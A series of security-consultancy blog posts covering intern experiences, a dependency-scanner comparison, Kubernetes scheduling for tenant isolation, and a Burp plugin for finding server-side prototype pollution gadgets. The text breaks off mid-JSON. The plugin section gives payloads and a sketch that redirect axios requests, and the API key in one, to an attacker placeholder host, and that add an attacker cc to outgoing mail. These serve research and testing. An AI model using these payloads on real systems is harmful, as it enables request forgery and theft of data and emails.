
Internship Experiences at Doyensec

The following blog post gives a voice to our 2023 interns and their experiences with us.

Aleandro

During my last high school year, I took part in the Cyberchallenge.it program, whose goal is to introduce young students to the world of offensive cybersecurity via lessons and CTF competitions. After that experience, some friends and I founded the r00tstici CTF team, attempting to bring some cybersecurity culture to the south of Italy. We also organized various workshops and events at the University of Salento.

Once I moved from the south of Italy to Pisa to study at the university, I joined the fibonhack CTF team. I also started working as a developer and penetration tester on small projects, both inside and outside the university.

Getting recruited

During April 2023, the Doyensec Twitter account posted a call for summer interns. Since I had been following Doyensec for months, after Luca’s talk at No Hat 2022, I submitted my application. This was both because I was bored with the university routine and because I wanted to try a job in the research field. It was a good fit, since I was coming from an environment of development and freelance pentesting, alongside CTF competitions.

The selection process I went through has already been described, in large part, by Robert in his previous post about his internship experience. Basically it consisted of:

  • An interview with the Practice Manager
  • A technical challenge on both web and mobile topics
  • Finally, a technical interview with two different security engineers

The interview was about various aspects of application security. This ranged from web security to low level stuff like assembly and even CPU internals.

First weeks

The actual internship started with a couple of weeks of research, where I went through some web application frameworks in Rust. After completing that research, I then moved on to an actual pentest for a client. I remember the first week felt really different and challenging. The code base was so large and so filled with functionalities that I felt overwhelmed with things to test, ideas to try and scenarios to replicate. Despite the size and complexity, there were initially no vulnerabilities found. Impostor syndrome started to kick in.

Eventually, things started to improve during the second week of that engagement. While we’re a 100% remote company, sometimes we get together to work in small teams. That week, I worked in-person with Luca. He helped me understand that sometimes software is just well-written and well-architected from a security perspective. For those situations, I needed to learn how to deal with not having immediate success, the focus required for testing and how to provide value to the client despite having low severity findings. Thankfully, we eventually found good bugs in that codebase anyway :)

San Marino landscape

Research weeks

The main research project of my internship was developing internal tools. Although it was not primarily about security, I enjoyed it a lot. Developing applications, fixing bugs and screaming about non-existent documentation is something I’ve done ever since I bought my first personal computer.

Responsibilities

It is important to note that even though you are the newest member of the company, with limited experience, all Doyensec team members treat you like any other employee. You could be in charge of talking with the client if any issues arise during an assessment, you will write and possibly peer review the reports, you will evaluate and assign severities to the vulnerabilities you’ve found, you will have your name on the report, and so on. Of course, you are assigned to work alongside more experienced engineers who will guide you through the process (Lorenzo in my case - who I would like to thank for helping me manage the flexible schedule and for all the other advice he gave me). However, you learn the most by actually doing, making your own decisions on how to proceed and, of course, making errors.

To me, this was a mind-blowing feeling. I did not expect to be such a complete part of the team, or that my opinions would matter. It was really a good approach, in my opinion. It took me a while to fit entirely into the role, but then it was fun all along the way.

Leonardo

Hi, my name is Leonardo, though some of you may know me better as maitai, the handle I’ve been using in the CTF scene since the start of my journey. I first encountered cybersecurity while earning my Bachelor of Science in computer science. From the very first moment, I was amazed by it, so I decided to dig deeper into hacking, starting with the PortSwigger Academy, which literally changed my life.

Getting recruited

If you have read the previous part of this blog post you have already met Aleandro. I knew him prior to joining Doyensec, since we played together on the same CTF team: fibonhack. While I was pursuing my previous internship, Aleandro and I talked a lot regarding our jobs and what to do in the near future. One day he told me that Doyensec would have an open internship position during the winter. I was a bit scared at first, just because it would be a really huge step for me to take on such a challenge. My previous internship had already ended when Doyensec opened the position. Although I was considering pursuing a master’s degree, I was still thinking about this opportunity all the time. I didn’t want to miss such a great opportunity, so I decided to submit my application. After all, what did I have to lose? I took it as a way to really challenge myself.

After a quick interview with the Practice Manager, I was made aware of the next steps in the interview process. First of all, the technical challenges used during the process were brand new: Doyensec had entirely renewed them, with a new platform and new challenges. I was essentially the first candidate to ever use the new platform.

The topics of the challenges were mostly web applications in several different languages, with different bugs to spot, alongside mobile challenges that involved the use of state-of-the-art technologies. I had 2 hours to complete as many challenges as I could, from a pool of 8. The time constraint was right, in my opinion. You have around 15 minutes per challenge, which is a reasonable amount of time. Even though I wasn’t experienced with mobile hacking, I pushed myself to the limit in order to find as many bugs as possible and eventually pass on to the next steps of the interview process. It was later explained to me that the review of numerous (but short) code snippets in a limited time-frame is meant to simulate the complexity of reviewing larger codebases with several weeks at your disposal.

A couple of days after the technical challenges I received an email from Doyensec in which they congratulated me for passing the technical challenges. I was thrilled at that point! I literally couldn’t wait for what would come after that! The email stated that the next step was a technical call with Luca. I reserved a spot on his calendar and waited for the day of the interview.

Luca asked me several questions, ranging from threat modeling to how to exploit certain vulnerabilities, to how to patch vulnerable code. It was a 360 degree interview. It also included some live code review. The interview lasted for an hour or so, and in the end Luca said that he would evaluate my performance and let me know. The day after, another email arrived. I had advanced to the final step, the interview with John, Doyensec’s other co-founder. During this interview, he asked me about different things, not strictly related to the application security world. As I said before, they examined me from many angles. The meeting with John also lasted for an hour. At this point, I had completed the whole process. I only needed to wait for their response, which didn’t take too long to come.

They offered me the internship position. I did it! I was happy to have overcome the challenge that I set for myself. I quickly accepted the position in order to jump straight into the action!

First weeks

In my first weeks, I did a lot of different things including retesting web and network level bugs, in order to be sure that all the vulnerabilities previously found by other engineers were properly fixed. I also did standard web application penetration testing. The application itself was really interesting and complex enough to keep my eyes glued to the screen, without losing interest in it. Another amazing engineer was assigned to the aforementioned project with me, so I was not alone during testing.

Since Doyensec is a fully remote company, we also hold some meetings during the day, in order to synchronize on the different things that can happen during a penetration test. Communication is a key part of Doyensec, and from great communication come great bugs.

Research weeks

During the internship, you’re also given 50% of your time to perform application security R&D. During my research weeks I was assigned to an open source project. In fact, I was tasked to write some plugins for Google’s web security scanner Tsunami. This is a general-purpose network security scanner, with an extensible plugin system for detecting high severity vulnerabilities with high confidence. Essentially, writing a plugin for Tsunami requires understanding a certain vulnerability in a product and writing an exploit for it that can be used to confirm its existence when scanning. I was assigned to write two plugins which detect weak credentials on the RabbitMQ Management Portal and RStudio Server. The plugins are written in Java, and since I’ve done a bit of Java programming during my Bachelor’s degree program I felt quite confident about it.

I really enjoyed writing those plugins and was also asked to write unit tests and a testbed that were used to actually reproduce the vulnerabilities. It was a really fun experience!

Responsibilities

As Aleandro already explained, interns are given a lot of responsibilities along with a great sense of freedom at Doyensec. I would add just one thing, which is about time management. This is one of the most difficult things for me. In a remote company, you don’t have time clocks or anything similar, so you can choose to work the way that you prefer. Luca told me several times that at Doyensec, it is the output that is evaluated. This was a big adjustment for me, since I was used to working a fixed schedule. Doyensec gave me the flexibility to work in the way I prefer, which, for me, is invaluable. That said, the activities are complex enough to keep you busy for several hours a day, but they are just as enjoyable.

Conclusions

Being an intern at Doyensec is an awesome experience because it allows you to jump into the world of application security without the need for extensive job experience. You can be successful as long as you have the skills and knowledge, regardless of how you acquired them.

Moreover, during those three months you’ll be able to test your skills and learn new ones on different technologies across a variety of targets. You’ll also get to know passionate and skilled people, and if you’re lucky enough, take part in company retreats and get some exclusive swag.

Gift from the retreat

In the end, you should consider applying for the next call for interns, if you:

  • are passionate about application security
  • already have good web security skills
  • have organizational capabilities
  • want scheduling flexibility
  • can manage remote work

If you’re interested in the role and think you’d make a good fit, apply via our careers page: https://www.careers-page.com/doyensec-llc. We’re now accepting candidates for the Summer Internship 2024.

A Look at Software Composition Analysis

Software Supply Chain as a factory assembly line

Background

At Doyensec, we specialize in performing white and gray box application security audits. So, in addition to dynamically testing applications, we typically audit our clients’ source code as well. This process is often software-assisted, with open source and off-the-shelf tools. Modern comprehensive versions of these tools offer the capability to detect the inclusion of vulnerable third-party libraries, commonly referred to as software composition analysis (SCA).

Finding the right tool

Three well-known tools in the SCA space are Snyk, Semgrep and Dependabot. The first two are stand-alone applications with cloud components, and the last is integrated directly into the GitHub(.com) environment. Since Security Automation is one of our core competencies, Doyensec has extensive experience with these tools, from writing custom detection rules for Semgrep, to assisting clients with selecting and deploying these types of tools in their SDLC processes. We have also previously published research into some of these, with regards to their Static Analysis Security Testing (SAST) capabilities. You can find those results here. After discussing this research directly with Semgrep, we were asked to perform an unbiased head-to-head comparison of the SCA functionality of these tools as well.

It’s time to ignore most dependency alerts.

You will find the results of this latest analysis here on our research page. In the whitepaper, we describe the process used to develop the testing corpus and our methodology. In short, the aim was to determine which tool provides the most actionable and efficient results (i.e., high true positive rates), regardless of the false negative rates. We considered this the optimal real-world setup for most security teams, because most can’t afford to routinely spend hours or days chasing false positives. The person-hours required to triage low fidelity tools in the hopes of an occasional true positive are simply too costly for all but the largest teams in the most secure environments. Additionally, any attempt at implementing deployment blocking as a result of CI/CD testing is unlikely to tolerate more than a minimal number of false positives.

False Positive Rate

More to Come

We hope you find the whitepaper comparing the tools informative and useful. Please follow our blog for more posts on current trends and topics in the world of application security. If you would like assistance with your application security projects, including security automation services, feel free to contact us at [email protected].

Kubernetes Scheduling And Secure Design

During testing activities, we usually analyze the design choices and context needs in order to suggest applicable remediations depending on the different Kubernetes deployment patterns.

Scheduling is often overlooked in Kubernetes designs. Typically, various mechanisms take precedence, including, but not limited to, Admission Controllers, Network Policies, and RBAC configurations.

Nevertheless, a compromised pod could allow attackers to move laterally to other tenants running on the same Kubernetes node. Pod-escaping techniques or shared storage systems could be exploitable to achieve cross-tenant access despite the other security measures.

Having a security-oriented scheduling strategy can help to reduce the overall risk of workload compromise in a comprehensive security design. If critical workloads are separated at the scheduling decision, the blast radius of a compromised pod is reduced.

By doing so, lateral movements related to the shared node, from low-risk tasks to business-critical workloads, are prevented.

Attackers on a compromised Pod with nothing around

Kubernetes provides multiple mechanisms to achieve isolation-oriented designs like node tainting or affinity. Below, we describe the scheduling mechanisms offered by Kubernetes and highlight how they contribute to actionable risk reduction.

The following methods to apply a scheduling strategy will be discussed:

  • nodeSelector
  • nodeName
  • Affinity & Anti-affinity
  • Inter-pod affinity and anti-affinity
  • Taints and Tolerations
  • Pod topology spread constraints
  • Custom schedulers

Mechanisms For Workload Separation

As mentioned earlier, isolating tenant workloads from each other helps in reducing the impact of a compromised neighbor. That happens because all pods running on a certain node will belong to a single tenant. Consequently, an attacker capable of escaping from a container will only have access to the containers and the volumes mounted to that node.

Additionally, when applications with different authorization levels share a node, privileged pods may end up running next to pods that mount PII data or carry a different security risk level.

1. nodeSelector

Among the scheduling constraints, nodeSelector is the simplest one, operating by simply specifying the target node labels inside the pod specification.

Example Pod Spec

apiVersion: v1
kind: Pod
metadata:
  name: nodeselector-pod
spec:
  containers:
  - name: nginx
    image: nginx:latest
  nodeSelector:
    myLabel: myvalue

If multiple labels are specified, they are treated as required (AND logic), hence scheduling will happen only on nodes satisfying all of them.

While it is very useful in low-complexity environments, it could easily become a bottleneck, blocking scheduling if many selectors are specified and no node satisfies all of them.

Consequently, it requires good monitoring and dynamic management of the labels assigned to nodes if many constraints need to be applied.
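
The labels themselves are typically applied and audited with kubectl. A quick sketch (the node name is hypothetical):

# Apply the label expected by the nodeSelector above
kubectl label nodes worker-01 myLabel=myvalue

# List nodes and show the label as a column
kubectl get nodes -L myLabel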

2. nodeName

If the nodeName field in the Spec is set, the kube-scheduler simply passes the Pod to the kubelet, which then attempts to assign the Pod to the specified node.

In that sense, nodeName overrides other scheduling rules (e.g., nodeSelector, affinity, anti-affinity, etc.) since the scheduling decision is pre-defined.

Example Pod Spec

apiVersion: v1
kind: Pod
metadata:
  name: nginx
spec:
  containers:
  - name: nginx
    image: nginx:latest
  nodeName: node-critical-workload

Limitations:

  • The Pod will not run if the node in the spec is not running or if it is out of resources to host it
  • Cloud environments like AWS EKS come with unpredictable node names

Consequently, it requires a detailed management of the available nodes and allocated resources for each group of workloads since the scheduling is pre-defined.

Note: In practice, this approach invalidates all the computational efficiency benefits of the scheduler, and it should only be applied to small groups of critical workloads that are easy to manage.

3. Affinity & Anti-affinity

The NodeAffinity feature enables the specification of rules for pod scheduling based on the characteristics or labels of nodes. These rules can be used to ensure that pods are scheduled onto nodes meeting specific requirements (affinity rules) or to avoid scheduling pods in specific environments (anti-affinity rules).

Affinity and anti-affinity rules can be set as either “preferred” (soft) or “required” (hard). If a rule is set as preferredDuringSchedulingIgnoredDuringExecution, it is a soft rule: the scheduler will try to adhere to it, but may not always do so, especially if adhering to it would make scheduling impossible or challenging. If a rule is set as requiredDuringSchedulingIgnoredDuringExecution, it is a hard rule: the scheduler will not schedule the pod unless the condition is met, which can leave a pod unscheduled (pending) if the condition isn’t met.

In particular, anti-affinity rules could be leveraged to protect critical workloads from sharing a node with non-critical ones. By doing so, the loss of computational optimization will not affect the entire node pool, but just the few instances that contain business-critical units.

Example of node affinity

apiVersion: v1
kind: Pod
metadata:
  name: node-affinity-example
spec:
  affinity:
    nodeAffinity:
      preferredDuringSchedulingIgnoredDuringExecution:
      - weight: 1
        preference:
          matchExpressions:
          - key: net-segment
            operator: In
            values:
            - segment-x
      requiredDuringSchedulingIgnoredDuringExecution:
        nodeSelectorTerms:
        - matchExpressions:
          - key: workloadtype
            operator: In
            values:
            - p0wload
            - p1wload
  containers:
  - name: node-affinity-example
    image: registry.k8s.io/pause:2.0

Here, the pod prefers nodes in a specific network segment (by label) and requires nodes whose workloadtype matches either p0wload or p1wload (a custom strategy).

Multiple operators are available (https://kubernetes.io/docs/concepts/scheduling-eviction/assign-pod-node/#operators); NotIn and DoesNotExist are the ones usable to obtain node anti-affinity.

From a security standpoint, only hard rules that require the conditions to be respected matter. preferredDuringSchedulingIgnoredDuringExecution should only be used for computational configurations that cannot affect the security posture of the cluster.

4. Inter-pod affinity and anti-affinity

Inter-pod affinity and anti-affinity could constrain which nodes the pods can be scheduled on based on the labels of pods already running on that node.
As specified in Kubernetes documentation:

“Inter-pod affinity and anti-affinity rules take the form ‘this Pod should (or, in the case of anti-affinity, should not) run in an X if that X is already running one or more Pods that meet rule Y’, where X is a topology domain like node, rack, cloud provider zone or region, or similar, and Y is the rule Kubernetes tries to satisfy.”

Example of anti-affinity

affinity:
  podAntiAffinity:
    requiredDuringSchedulingIgnoredDuringExecution:
    - labelSelector:
        matchExpressions:
        - key: app
          operator: In
          values:
          - testdatabase
      # topologyKey is mandatory: here the isolation domain is the single node
      topologyKey: kubernetes.io/hostname

In the podAntiAffinity case above, the pod will never be scheduled on a node where a pod labeled app: testdatabase is running.

It fits designs where it is desired to schedule some pods together or where the system must ensure that certain pods are never going to be scheduled together.

In particular, the inter-pod rules allow engineers to define additional constraints within the same execution context without further creating segmentation in terms of node groups. Nevertheless, complex affinity rules could create situations with pods stuck in pending status.

5. Taints and Tolerations

Taints are the opposite of node affinity properties since they allow a node to repel a set of pods not matching some tolerations.

Taints can be applied to a node to make it repel pods unless they explicitly tolerate the taints.

Tolerations are applied to pods and allow the scheduler to schedule them on nodes with matching taints. It should be highlighted that while tolerations allow scheduling, the placement is not guaranteed.

Each taint also defines an effect: NoExecute (also affects running pods), NoSchedule (hard rule), PreferNoSchedule (soft rule).

The approach is ideal for environments where strong isolation of workloads is required, and it allows the creation of custom node-selection rules not based solely on labels. It leaves little flexibility, however.
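
As a minimal sketch (node and taint names are hypothetical), a node can be tainted with kubectl taint nodes node-critical workload=critical:NoSchedule, and only pods carrying a matching toleration will be allowed there:

apiVersion: v1
kind: Pod
metadata:
  name: critical-pod
spec:
  containers:
  - name: app
    image: nginx:latest
  tolerations:
  - key: "workload"
    operator: "Equal"
    value: "critical"
    effect: "NoSchedule"

Note that the toleration only allows scheduling onto the tainted node; to also force critical pods into that node group, pair the taint with nodeSelector or node affinity.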

6. Pod topology spread constraints

You can use topology spread constraints to control how Pods are spread across your cluster among failure-domains such as regions, zones, nodes, and other user-defined topology domains. This can help to achieve high availability as well as efficient resource utilization.
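
A short example (labels and topology key chosen for illustration): the constraint below spreads pods labeled app: web across zones, refusing to schedule a pod when the imbalance between zones would exceed one:

apiVersion: v1
kind: Pod
metadata:
  name: spread-example
  labels:
    app: web
spec:
  topologySpreadConstraints:
  - maxSkew: 1
    topologyKey: topology.kubernetes.io/zone
    whenUnsatisfiable: DoNotSchedule
    labelSelector:
      matchLabels:
        app: web
  containers:
  - name: app
    image: nginx:latest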

7. Not satisfied? Custom Scheduler To The Rescue

Kubernetes by default uses the kube-scheduler, which follows its own set of criteria for scheduling pods. While the default scheduler is versatile and offers a lot of options, there might be specific security requirements that it does not know about. Writing a custom scheduler allows an organization to apply risk-based scheduling and avoid pairing privileged pods with pods processing or accessing sensitive data.

To create a custom scheduler, you would typically write a program that:

  • Watches for unscheduled pods
  • Implements a scheduling algorithm to decide on which node the pod should run
  • Communicates the decision to the Kubernetes API server.
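
A heavily simplified sketch of those three steps using client-go is shown below. The scheduler name, node-picking logic and node names are hypothetical placeholders; a production scheduler would also need informers, scoring and proper error handling:

package main

import (
	"context"
	"fmt"

	corev1 "k8s.io/api/core/v1"
	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
	"k8s.io/apimachinery/pkg/watch"
	"k8s.io/client-go/kubernetes"
	"k8s.io/client-go/tools/clientcmd"
)

// pickNodeByRisk is a placeholder for the actual risk-based logic, e.g.
// never co-locating privileged pods with pods mounting sensitive data.
func pickNodeByRisk(pod *corev1.Pod) string {
	return "node-low-risk-pool-1" // hypothetical node name
}

func main() {
	cfg, err := clientcmd.BuildConfigFromFlags("", clientcmd.RecommendedHomeFile)
	if err != nil {
		panic(err)
	}
	clientset, err := kubernetes.NewForConfig(cfg)
	if err != nil {
		panic(err)
	}

	// 1. Watch for pods that requested this scheduler and are still unscheduled
	w, err := clientset.CoreV1().Pods("").Watch(context.Background(), metav1.ListOptions{
		FieldSelector: "spec.schedulerName=risk-aware-scheduler,spec.nodeName=",
	})
	if err != nil {
		panic(err)
	}

	for event := range w.ResultChan() {
		pod, ok := event.Object.(*corev1.Pod)
		if !ok || event.Type != watch.Added {
			continue
		}
		// 2. Decide on which node the pod should run
		node := pickNodeByRisk(pod)
		// 3. Communicate the decision to the API server via a Binding
		binding := &corev1.Binding{
			ObjectMeta: metav1.ObjectMeta{Name: pod.Name, Namespace: pod.Namespace},
			Target:     corev1.ObjectReference{Kind: "Node", Name: node},
		}
		if err := clientset.CoreV1().Pods(pod.Namespace).Bind(context.Background(), binding, metav1.CreateOptions{}); err != nil {
			fmt.Println("bind failed:", err)
		}
	}
}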

Some examples of custom schedulers that can be adapted for this purpose can be found in the following GitHub repositories: kubernetes-sigs/scheduler-plugins and onuryilmaz/k8s-scheduler-example.
Additionally, a good presentation on crafting your own is Building a Kubernetes Scheduler using Custom Metrics by Mateo Burillo (Sysdig). As mentioned in the talk, this is not for the faint of heart because of the complexity involved, and you might be better off sticking with the default scheduler if you are not already planning to build one.

Offensive Tips: Scheduling policies are like magnets

As described, scheduling policies could be used to attract or repel pods onto specific groups of nodes.

As previously stated, a proper strategy reduces the blast radius of a compromised pod. Nevertheless, there are still some aspects to take care of from the attacker’s perspective.

In specific cases, the implemented mechanisms could be used either to:

  • Attract critical pods - A compromised node, or a role able to edit node metadata, could be abused to attract pods interesting to the attacker by manipulating the labels of a controlled node.
    • Carefully review roles and internal processes that could be abused to edit node metadata. Verify the possibility for internal threats to exploit the attraction by influencing or changing labels and taints
  • Avoid rejection on critical nodes - If users are allowed to submit pod specs, or have indirect control over how they are dynamically constructed, the scheduling sections could be abused. An attacker able to submit pod specs could use scheduling preferences to jump to a critical node.
    • Always review the scheduling strategy to find the options allowing pods to land on nodes hosting critical workloads. Verify whether user-controlled flows allow adding them or whether the logic could be abused by some internal flow
  • Prevent other workloads from being scheduled - In some cases, knowing or reversing the applied strategy could allow a privileged attacker to craft pods that block legitimate workloads at the scheduling decision.
    • Look for potential mixes of labels usable to lock the scheduling on a node

Bonus Section: Node labels security

Normally, the kubelet is still able to modify the labels of its own node, potentially allowing a compromised node to tamper with its labels and trick the scheduler, as described above.

A security measure can be applied with the NodeRestriction admission plugin. It denies label editing from the kubelet if the node-restriction.kubernetes.io/ prefix is present in the label key.
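
For example (node name and label value hypothetical), once the plugin is enabled on the API server, labels under the reserved prefix can only be managed by cluster administrators:

# API server started with: --enable-admission-plugins=NodeRestriction

# Set by an administrator; the node's own kubelet cannot add, modify or remove it
kubectl label nodes node-critical node-restriction.kubernetes.io/pool=critical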

Wrap-up: Time to take the scheduling decision

Security-wise, dedicated nodes for each namespace/service would constitute the best setup. However, such a design would not exploit Kubernetes’ ability to optimize computations.

The following examples represent some trade-off choices:

  • Isolate critical namespaces/workloads on their own node group
  • Reserve a node for critical pods of each namespace
  • Deploy a completely independent cluster for critical namespaces

The core concept for a successful approach is having a set of reserved nodes for critical namespaces/workloads.

Real world scenarios and complex designs require engineers to plan the fitting mix of mechanisms according to performance requirements and risk tolerance.

This decision starts with defining the workloads’ risk:

  • Different teams, different trust level
    It’s not uncommon for large organizations to have multiple teams deploying to the same cluster. Different teams might have different levels of trustworthiness, training, or access. This diversity can introduce varying levels of risk.

  • Data being processed or stored
    Some pods may require mounting customer data or having persistent secrets to perform tasks. Sharing a node with less hardened workloads may put that data at risk

  • Exposed network services on the same node
    Any pod that exposes a network service increases its attack surface. Pods interacting with external-facing requests may suffer from this exposure and be more at risk of compromise.

  • Pod privileges and capabilities, or its assigned risk
    Some workloads may need certain privileges to work, or may run code that by its very nature processes potentially unsafe content or third-party vendor code. All these factors can contribute to increasing a workload’s assigned risk.

Once the set of risks within the environment has been identified, decide the isolation level for teams/data/network traffic/capabilities. Grouping them when they are part of the same process could do the trick.

At that point, the number of workloads in each isolation group can be evaluated and addressed by mixing the scheduling strategies according to the size and complexity of each group.

Note: Simple environments should use simple strategies and avoid mixing too many mechanisms if few isolation groups and constraints are present.

Unveiling the Server-Side Prototype Pollution Gadgets Scanner

Introduction

Prototype pollution has recently emerged as a fashionable vulnerability within the realm of web security. This vulnerability occurs when an attacker exploits the nature of JavaScript’s prototype inheritance to modify a prototype of an object. By doing so, they can inject malicious code or alter an application to behave in unintended ways. This could potentially lead to sensitive information leakage, type confusion vulnerabilities, or even remote code execution, under certain conditions.

For those interested in diving deeper into the technicalities and impacts of prototype pollution, we recommend checking out PortSwigger’s comprehensive guide.

// Example of prototype pollution in a browser console
Object.prototype.isAdmin = true;
const user = {};
console.log(user.isAdmin); // Outputs: true

To fully understand the exploitation of this vulnerability, it’s crucial to know what “sources” and “gadgets” are.

  • Sources: A source in the context of prototype pollution refers to a piece of code that performs a recursive assignment without properly validating the objects involved. This action creates a pathway for attackers to modify the prototype of an object. The main sources of prototype pollution are:
    • Custom Code: This includes code written by developers that does not adequately check or sanitize user input before processing it. Such code can directly introduce vulnerabilities into an application.
    • Vulnerable Libraries: External libraries that contain vulnerabilities can also lead to prototype pollution. This often happens through recursive assignments, like the merge function below, that fail to validate the safety of the objects being merged or extended (a short exploitation sketch follows this list).
// Example of recursive assignment leading to prototype pollution
function merge(target, source) {
    for (let key in source) {
        if (typeof source[key] === 'object') {
            // No check on the key name: a "__proto__" key makes target[key]
            // resolve to Object.prototype, which is then merged into
            if (!target[key]) target[key] = {};
            merge(target[key], source[key]);
        } else {
            target[key] = source[key];
        }
    }
}
  • Gadgets: Gadgets refer to methods or pieces of code that exploit the prototype pollution vulnerability to achieve an attack. By manipulating the prototype of a base object, attackers can alter the application’s logic, gain unauthorized access, or execute arbitrary code, depending on the application’s structure and the nature of the polluted prototype.
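
To make the distinction concrete, here is a minimal sketch (runnable in Node.js) of how the merge source above can be exploited; the isAdmin property is a hypothetical gadget target:

// merge() is the vulnerable function defined above
function merge(target, source) {
    for (let key in source) {
        if (typeof source[key] === 'object') {
            if (!target[key]) target[key] = {};
            merge(target[key], source[key]);
        } else {
            target[key] = source[key];
        }
    }
}

// Attacker-controlled JSON, e.g. the body of an HTTP request
const payload = JSON.parse('{"__proto__": {"isAdmin": true}}');

const config = {};
merge(config, payload); // recurses into config.__proto__, i.e. Object.prototype

console.log({}.isAdmin); // true: every object now inherits the property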

State of the Art

Before diving into the specifics of our research, it’s crucial to understand the landscape of existing research on prototype pollution. This will help us identify the gaps in current methodologies and tools, and how our work aims to address them.

On the client side, there is a wealth of research and tools available. For sources, an excellent starting point is the compilation found on GitHub (client-side prototype pollution sources). As for gadgets, detailed exploration and exploitation techniques have been documented in various write-ups, such as this informative piece on InfoSec Writeups and PortSwigger’s own guide on client-side prototype pollution.

Additionally, there are tools designed to detect and exploit this vulnerability in an automated manner, both from the command line and within the browser. These include the PP-Finder CLI tool and DOM Invader, a feature of Burp Suite designed to uncover client-side prototype pollution.

However, the research and tooling landscape for server-side prototype pollution presents a different picture:

  • PortSwigger’s research provides a foundational understanding of server-side prototype pollution with various detection methodologies. However, a significant limitation is that some of these detection methods have become obsolete over time. More importantly, while it excels in identifying vulnerabilities, it does not extend to facilitating their real-world exploitation using gadgets. This gap indicates a need for tools that not only detect but also enable the practical exploitation of identified vulnerabilities.

  • On the other hand, YesWeHack’s guide introduces several intriguing gadgets, some of which have been incorporated into our plugin (below). Despite this valuable contribution, the guide occasionally ventures into hypothetical scenarios that may not always align with realistic application contexts. Moreover, it falls short of providing an automated approach for discovering gadgets in a black-box testing environment. This is crucial for comprehensive vulnerability assessments and exploitation in real-world settings.

This overview underscores the need for further innovation in server-side prototype pollution research, specifically in developing tools that not only detect but also exploit this vulnerability in a practical, automated manner.

About the Plugin

Following the insights previously discussed, we’ve developed a Burp Suite plugin for detecting gadgets in server-side prototype pollution: the Server-Side Prototype Pollution Gadgets Scanner, available on GitHub. This tool represents a novel approach in the realm of web security, focusing on the precise identification and exploitation of prototype pollution vulnerabilities.

The core functionality of this plugin is to take a JSON object from a request and systematically attempt to poison all possible fields with a predefined set of gadgets. For example, given a JSON object:

{
  "user": "example",
  "auth": false
}

The plugin would attempt various poisonings, such as:

{
  "user": {"__proto__": <polluted_object>},
  "auth": false
}

or:

{
  "user": "example",
  "auth": {"__proto__": <polluted_object>}
}

Our decision to create a new plugin, rather than relying solely on custom checks (bchecks) or the existing server-side prototype pollution scanner highlighted in PortSwigger’s blog, was driven by a practical necessity. These tools, while powerful in their detection capabilities, do not automatically revert the modifications made during the detection process. Given that some gadgets could adversely affect the system or alter application behavior, our plugin specifically addresses this issue by carefully removing the poisonings after their detection. This step is crucial to ensure that the exploitation process does not compromise the application’s functionality or stability. By taking this approach, we aim to provide a tool that not only identifies vulnerabilities but also maintains the integrity of the application by preventing potential disruptions caused by the exploitation activities.

Furthermore, all gadgets introduced by the plugin operate out-of-bounds (OOB). This design choice stems from the understanding that the source of pollution might be entirely separate from where a gadget is triggered within the application’s codebase. Therefore, the exploitation occurs asynchronously, relying on OOB techniques that wait for interaction. This method ensures that even if the polluted property is not immediately used, it can still be exploited, once the application interacts with the poisoned prototype. This showcases the versatility and depth of our scanning approach.

Plugin Screenshot

Methodology for Finding Gadgets

To discover gadgets capable of altering an application’s behavior, our approach involved a thorough examination of the documentation for common Node.js libraries. We focused on identifying optional parameters within these libraries that, when modified, could introduce security vulnerabilities or lead to unintended application behaviors. Part of our methodology also includes defining a standard format for describing each gadget within our plugin:

{
  "payload": {"<parameter>": "<URL>"},
  "description": "<Description>",
  "null_payload": {"<parameter>": {}}
}
  • Payload: Represents the actual payload used to exploit the vulnerability. The <URL> placeholder is where the URL of the collaborator is inserted.
  • Description: Provides a brief explanation of what the gadget does or what vulnerability it exploits.
  • Null_payload: Specifies the payload that should be used to revert the changes made by the payload, effectively “de-poisoning” the application to prevent any unintended behavior.

This format ensures a consistent and clear way to document and share gadgets among the security community, facilitating the identification, testing, and mitigation of prototype pollution vulnerabilities.

Axios Library

Axios is widely used for making HTTP requests. By examining the Axios documentation and request configuration options, we identified that certain parameters, such as baseURL and proxy, can be exploited for malicious purposes.

  • Vulnerable Code Example:
    app.get("/get-api-key", async (req, res) => {
      try {
          const instance = axios.create({baseURL: "https://doyensec.com"});
          const response = await instance.get("/?api-key=<API_KEY>");
      }
    });
    
  • Gadget Explanation: Manipulating the baseURL parameter allows for the redirection of HTTP requests to a domain controlled by an attacker, potentially facilitating Server-Side Request Forgery (SSRF) or data exfiltration. For the proxy parameter, the key to exploitation lies in the ability to reroute outgoing HTTP requests through an attacker-controlled proxy. While Burp Collaborator itself cannot act as a proxy to directly capture or manipulate these requests, the fact that it can detect DNS lookups initiated by the application is crucial. Observing DNS requests to domains we control, triggered by poisoning the proxy configuration, indicates that the application accepted the poisoned configuration; it highlights the potential vulnerability without the need to directly observe proxy traffic. From this, we can infer that with the correct setup (outside of Burp Collaborator), an actual proxy could be deployed to fully intercept and manipulate HTTP communications, demonstrating the vulnerability’s exploitability. A minimal end-to-end sketch of the baseURL gadget follows the gadget definitions below.

  • Gadget for Axios:
    {
      "payload": {"baseURL": "https://<URL>"},
      "description": "Modifies 'baseURL', leading to SSRF or sensitive data exposure in libraries like Axios.",
      "null_payload": {"baseURL": {}}
    },
    {
      "payload": {"proxy": {"protocol": "http", "host": "<URL>", "port": 80}},
      "description": "Sets a proxy to manipulate or intercept HTTP requests, potentially revealing sensitive info.",
      "null_payload": {"proxy": {}}
    }
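
The following sketch illustrates why the baseURL gadget works (hedged: the exact config-merging behavior depends on the axios version, and the attacker host is a placeholder). Since axios resolves missing config options through regular property lookups, a polluted Object.prototype.baseURL can be picked up by a client created with an empty config:

const axios = require('axios');

// Simulate a successful server-side prototype pollution of `baseURL`
Object.prototype.baseURL = 'https://attacker.example.com';

// The application code believes it is requesting a relative path...
const client = axios.create({});
client.get('/internal/api-key')
    .then(res => console.log(res.status))
    .catch(err => console.log(err.message));
// ...but the request is routed to the attacker-controlled host

// The plugin's null_payload plays the same role as this cleanup:
delete Object.prototype.baseURL;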
    

Nodemailer Library

Nodemailer is another library we explored and is primarily used for sending emails. The Nodemailer documentation reveals that parameters like cc and bcc can be exploited to intercept email communications.

  • Vulnerable Code Example:
    // transporter and mailOptions are defined elsewhere (user input reaches mailOptions)
    transporter.sendMail(mailOptions, (error, info) => {
      if (error) {
          res.status(500).send('500!');
      } else {
          res.send('200 OK');
      }
    });
    
  • Gadget Explanation: By adding ourselves as a cc or bcc recipient in the email configuration, we can potentially intercept all emails sent by the platform, gaining access to sensitive information or communications (see the sketch after the gadget definitions below).

  • Gadget for Nodemailer:
    {
      "payload": {"cc": "email@<URL>"},
      "description": "Adds a CC address in email libraries, potentially intercepting all platform emails.",
